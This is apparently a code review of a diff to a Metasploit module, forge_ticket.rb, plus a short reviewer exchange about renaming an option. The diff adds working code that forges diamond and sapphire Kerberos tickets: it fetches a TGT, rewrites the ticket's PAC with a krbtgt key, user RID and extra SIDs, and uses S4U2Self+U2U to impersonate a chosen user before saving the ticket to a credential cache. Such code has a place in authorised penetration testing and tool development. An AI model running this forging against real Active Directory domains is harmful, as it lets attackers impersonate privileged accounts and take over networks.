modules/auxiliary/admin/kerberos/forge_ticket.rb

```diff
@@ -113,24 +130,136 @@ def forge_silver
+    rescue Rex::HostUnreachable => e
+      fail_with(Msf::Exploit::Failure::Unreachable, "Requesting TGT failed: #{e.message}")
+    end
+
+    if tgt_result.krb_enc_key[:enctype] != enc_type
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Response has incorrect encryption type (#{tgt_result.krb_enc_key[:enctype]})")
+    end
+
+    begin
+      ticket = modify_ticket(tgt_result.as_rep.ticket, tgt_result.decrypted_part, datastore['USER'], datastore['USER_RID'], datastore['DOMAIN'], extra_sids, enc_key, enc_type, enc_key, false)
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Failed to modify ticket. krbtgt key is likely incorrect')
+    end
+    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: datastore['RHOST'])
+
+    if datastore['VERBOSE']
+      print_ccache_contents(ticket, key: enc_key)
+    end
+  end
+
+  def forge_sapphire
+    validate_remote
+    validate_key!
+    options = {}
+    enc_key, enc_type = get_enc_key_and_type
+    include_crypto_params(options, enc_key, enc_type)
+
+    begin
+      auth_context = kerberos_authenticator.authenticate_via_kdc(options)
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Error authenticating to KDC: #{e}")
+    rescue Rex::HostUnreachable => e
+      fail_with(Msf::Exploit::Failure::Unreachable, "Requesting TGT failed: #{e.message}")
+    end
+    credential = auth_context[:credential]
+
+    print_status("#{peer} - Using U2U to impersonate #{datastore['USER']}@#{datastore['DOMAIN']}")
+
+    session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
+      type: credential.keyblock.enctype.value,
+      value: credential.keyblock.data.value
+    )
+
+    begin
+      tgs_ticket, tgs_auth = kerberos_authenticator.u2uself(credential, impersonate: datastore['USER'])
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Error executing S4U2Self+U2U: #{e}")
+    rescue Rex::HostUnreachable => e
+      fail_with(Msf::Exploit::Failure::Unreachable, "Error executing S4U2Self+U2U: #{e.message}")
+    end
+    # Don't pass a user RID in: we'll retrieve it from the decrypted PAC
+    ticket = modify_ticket(tgs_ticket, tgs_auth, datastore['USER'], nil, datastore['DOMAIN'], extra_sids, session_key.value, enc_type, enc_key, true)
+    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: datastore['RHOST'])
+
+    if datastore['VERBOSE']
+      print_ccache_contents(ticket, key: enc_key)
+    end
+  end
+
+  def validate_remote
+    if datastore['RHOST'].nil? || datastore['RHOST'].empty?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Must specify RHOST for sapphire and diamond tickets')
```

Comment:
Would you mind changing this from `RHOST` to `RHOSTS` so it's aligned with the option the user sees in the `options` output.

Reply:
Done.